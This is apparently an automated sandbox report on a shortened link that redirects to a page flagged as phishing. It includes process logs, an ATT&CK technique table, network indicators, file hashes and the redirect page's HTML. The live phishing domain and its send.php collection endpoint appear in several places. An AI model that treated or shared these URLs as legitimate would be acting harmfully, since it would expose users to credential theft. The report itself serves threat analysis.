          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,12504391894528968252,14865817341340154054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          3
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://t.co/nq9BYOxCg9100%Avira URL Cloudmalware
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc10%Avira URL Cloudsafe
          https://flowerrainoover.com/.dlk/send.php100%Avira URL Cloudphishing
          https://flowerrainoover.com/cdn-cgi/challenge-platform/scripts/jsd/main.js100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            t.co
            162.159.140.229
            truefalse
              high
              code.jquery.com
              151.101.194.137
              truefalse
                high
                flowerrainoover.com
                172.67.157.254
                truetrue
                  unknown
                  www.google.com
                  142.250.181.68
                  truefalse
                    high
                    upload.wikimedia.org
                    185.15.58.240
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://flowerrainoover.com/cdn-cgi/challenge-platform/scripts/jsd/main.jstrue
                      • Avira URL Cloud: phishing
                      unknown
                      https://a.nel.cloudflare.com/report/v4?s=fcO%2BJovCTSTgVywej%2BfZgIFS91BxdD9wqiUCdSYsWuYMKflvY4bfVt%2F9QlWQVyXQuLDaRJkGH5pjBSmxeP0ynVXMX9LDXYN%2Bw3C5%2BLDJ9hVTO78y6Ble8xorMbNbhracfu0SJwUvfalse
                        high
                        blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1true
                        • Avira URL Cloud: safe
                        unknown
                        https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svgfalse
                          high
                          https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svgfalse
                            high
                            https://flowerrainoover.com/.dlk/send.phptrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                              high
                              https://t.co/nq9BYOxCg9false
                                high
                                https://a.nel.cloudflare.com/report/v4?s=aIqlt4R4EBdH8iEfAqquLuNB4MKYmEYRnTzUMH%2BFJG%2BYkUOIvVmIgYYlQ5IBh0akJ4i3NZdnotWOi5wHqrc9eqvQyT8p0aETh%2F8%2FpXnuVmzk7MvvsFghmzuPqofY0pT%2FZQgy7rakfalse
                                  high
                                  https://flowerrainoover.com/.dlk/inv.htmlfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.67.157.254
                                    flowerrainoover.comUnited States
                                    13335CLOUDFLARENETUStrue
                                    185.15.58.240
                                    upload.wikimedia.orgNetherlands
                                    14907WIKIMEDIAUSfalse
                                    162.159.140.229
                                    t.coUnited States
                                    13335CLOUDFLARENETUSfalse
                                    151.101.2.137
                                    unknownUnited States
                                    54113FASTLYUSfalse
                                    239.255.255.250
                                    unknownReserved
                                    unknownunknownfalse
                                    142.250.181.68
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    35.190.80.1
                                    a.nel.cloudflare.comUnited States
                                    15169GOOGLEUSfalse
                                    151.101.194.137
                                    code.jquery.comUnited States
                                    54113FASTLYUSfalse
                                    IP
                                    192.168.2.16
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1564181
                                    Start date and time:2024-11-27 23:06:04 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 24s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                    Sample URL:https://t.co/nq9BYOxCg9
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal92.phis.win@18/19@16/9
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 74.125.205.84, 34.104.35.123, 172.217.17.78, 172.217.17.35
                                    • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: https://t.co/nq9BYOxCg9
                                    No simulations
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 21:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2673
                                    Entropy (8bit):3.9878483153308126
                                    Encrypted:false
                                    SSDEEP:48:89doT6LUcH8idAKZdA1FehwiZUklqehqy+3:8Y2grpy
                                    MD5:95A9128B8172938075C828CAC2C54723
                                    SHA1:3B1C3DE8AC777B413DBC7FC8E804780CE1E8AEF2
                                    SHA-256:DCBD528D179C177BCBCBBBB46F33B1BAC1789C0A2294589CF52D06ADA412B186
                                    SHA-512:2698A9725C7320F4205DCFAC2BF8FCBC28649189B6C6DA26EFAA4B551D7648865F9914286FED7CB5AF65B4DC0E1C45D3BCDBAADBB4B404856989A576EA75B07E
                                    Malicious:false
                                    Reputation:low
                                    Preview:L..................F.@.. ...$+.,....+...A..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 21:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2675
                                    Entropy (8bit):4.006729164669344
                                    Encrypted:false
                                    SSDEEP:48:82doT6LUcH8idAKZdA1seh/iZUkAQkqehZy+2:8h2g19QQy
                                    MD5:40017E374A6CE33723BF5088DDEE083D
                                    SHA1:60F0B858F94158D4A79BB6D0492B31D45B737499
                                    SHA-256:174035BAAEDFA79274E1DEA806A46A788FBFCBDB7D815154D841A41601C36264
                                    SHA-512:E3A5ABE995F0134ED94D8DD11B36157B56B1D32EE07E76A3979A597AD925F176AD397B12127AB5FE96162AA29982DBCA972C2824F4020A905CFB98CDB41004D8
                                    Malicious:false
                                    Reputation:low
                                    Preview:L..................F.@.. ...$+.,.........A..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2689
                                    Entropy (8bit):4.014315733578201
                                    Encrypted:false
                                    SSDEEP:48:88doT6LUAH8idAKZdA14meh7sFiZUkmgqeh7sny+BX:8j2gFn1y
                                    MD5:DC15E3166B52266DE0B0DF3127BD9E36
                                    SHA1:53A4708C95F368AA1415C44E6C43500F26016DAD
                                    SHA-256:FEC3776B4FCFB415D5FC968F5F563A83B5382885B9FBCA90D5BC8DFCC4FFF6B9
                                    SHA-512:D988FB97BDD9532C80D3F1BA843F49FA3BDF3307EC731BD4A5967F71C86CF318E2DF2B99CC2803FB7686EA09B2353AE5F3D2D7FFB0361BC1BA50A33B94EA4EE9
                                    Malicious:false
                                    Reputation:low
                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 21:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):4.003677511491804
                                    Encrypted:false
                                    SSDEEP:48:8EdoT6LUcH8idAKZdA1TehDiZUkwqehNy+R:872gm/y
                                    MD5:958E640133F1DEF45DAF90615B8D8FF7
                                    SHA1:E8A42AFD601E2E58D2A3A786BBC228B76A0F68CB
                                    SHA-256:8EF96DD1B594D4F30E7B0152DA63F5712F2D181465F7AB60FE2B5DF3B2308C25
                                    SHA-512:8A5B95A4FFDC866EAE96CB0BB2FDF09C592A28F319423803EC15F188C98E199BDCF104EAFE08B37A3F569CBD776F4B7763625B977469428AC17B737E05B00BAA
                                    Malicious:false
                                    Reputation:low
                                    Preview:L..................F.@.. ...$+.,.....n...A..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 21:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.9925358046043806
                                    Encrypted:false
                                    SSDEEP:48:8SdoT6LUcH8idAKZdA1dehBiZUk1W1qehDy+C:892gG9jy
                                    MD5:1877D14E592568D720500ECEB1358DED
                                    SHA1:76B86B7EA6A7D543722FF606B5E8D97E927AA05F
                                    SHA-256:E6AE17C23374BCDA4259BA2E7235D9C98C4407554758F82EA17F544AD193AD0B
                                    SHA-512:4B5B62A204DE55CEEC3553F55DC243397166E99A12B5849DF9FC3DA7CEF5B0F557584C82F5EB0384F10BC21E7D75119F95A55668FE1BF09781BE5344EFFBCEA4
                                    Malicious:false
                                    Reputation:low
                                    Preview:L..................F.@.. ...$+.,........A..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 21:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2679
                                    Entropy (8bit):4.000032321988763
                                    Encrypted:false
                                    SSDEEP:48:8TdoT6LUcH8idAKZdA1duTeehOuTbbiZUk5OjqehOuTb1y+yT+:8a2g8TfTbxWOvTb1y7T
                                    MD5:4EC41D16029A3D78C45B5ED2E0956277
                                    SHA1:1B6566A933F2DC348561F79E8292270FC291C69D
                                    SHA-256:7822224634AD2DD5C14A311CFEE42A54AC6EB86C4F78ED6A33BD277B23C605A9
                                    SHA-512:50BAA8322533D9DC3D9BA87A47979BB9A5DCDCA158B1275FB302C10B201487DA56C8566C68EB9BFB65552ACB662E0EE61ACF688937AD6E3E1BB2080C1C9FD22E
                                    Malicious:false
                                    Reputation:low
                                    Preview:L..................F.@.. ...$+.,.....1...A..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:dropped
                                    Size (bytes):5094
                                    Entropy (8bit):4.834039771497343
                                    Encrypted:false
                                    SSDEEP:96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus
                                    MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                    SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                    SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                    SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164">. <g transform="translate(53.548057 -183.975276) scale(1.4843)">. <path fill="#ff2116" d="M-29.632812 123.94727c-3.551967 0-6.44336 2.89347-6.44336 6.44531v49.49804c0 3.55185 2.891393 6.44532 6.44336 6.44532H8.2167969c3.5519661 0 6.4433591-2.89335 6.4433591-6.44532v-40.70117s.101353-1.19181-.416015-2.35156c-.484969-1.08711-1.275391-1.84375-1.275391-1.84375a1.0584391 1.0584391 0 0 0-.0059-.008l-9.3906254-9.21094a1.0584391 1.0584391 0 0 0-.015625-.0156s-.8017392-.76344-1.9902344-1.27344c-1.39939552-.6005-2.8417968-.53711-2.8417968-.53711l.021484-.002z" color="#000" font-family="sans-serif" overflow="visible" paint-order="markers fill stroke" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feat
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):279
                                    Entropy (8bit):4.815143125369301
                                    Encrypted:false
                                    SSDEEP:6:fc3MRJVxr6kM1zuI87yNAUm0RLkM1zuI8oCX9BXW31AXVVDIM1zSB7KHNG4/b:fc3MxxOLCQpm0RLLCTPXK+XVVDnu2HRT
                                    MD5:5408697C0AC9041A0F724CBCA1F717C7
                                    SHA1:AF219B7B66C0BEF88856D02470C019DB68257709
                                    SHA-256:CCB6202A8AF65CFA0884FD9BD2653E015583479B86CDE377DAD22F7D0A40AB9D
                                    SHA-512:7F508FEDCB6F18D4641317D02EFB17A50C0882869222BE9ED5477CA2B6FA4ED0F838639EA7658342C5E8DB80F828B085D9E456E9DEE26B57FBF484D1B3EFB394
                                    Malicious:false
                                    Reputation:low
                                    URL:https://t.co/nq9BYOxCg9
                                    Preview:<head><noscript><META http-equiv="refresh" content="0;URL=https://flowerrainoover.com/.dlk/inv.html"></noscript><title>https://flowerrainoover.com/.dlk/inv.html</title></head><script>window.opener = null; location.replace("https:\/\/flowerrainoover.com\/.dlk\/inv.html")</script>
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (9545)
                                    Category:downloaded
                                    Size (bytes):11281
                                    Entropy (8bit):5.705575844194148
                                    Encrypted:false
                                    SSDEEP:192:wyItee33pa89RcxNv/xErA1WaCR6bjW1HFIPnx/k:rIteeJa89R655E6CR6bi1lIPnx/k
                                    MD5:CAA76C13817C24A53DC2CBFFED8A74A5
                                    SHA1:21E091F6B4E3AFEA9B5E840C4096562C1A5D1420
                                    SHA-256:93AFA43A15E9C0169942E82927687F4A71DCC232EAA6A2DA4428D84787CD11BF
                                    SHA-512:99DBE86E52999E1DE1FFD4DC7D3E7E0B17C0ADC7C70E0BF54B0D0A5C22A1B2FDC3A97B3BFDF5A0D511F2D96743B7089CDA620D5E9085DF1658C57F3321D9C4D7
                                    Malicious:false
                                    Reputation:low
                                    URL:https://flowerrainoover.com/.dlk/inv.html
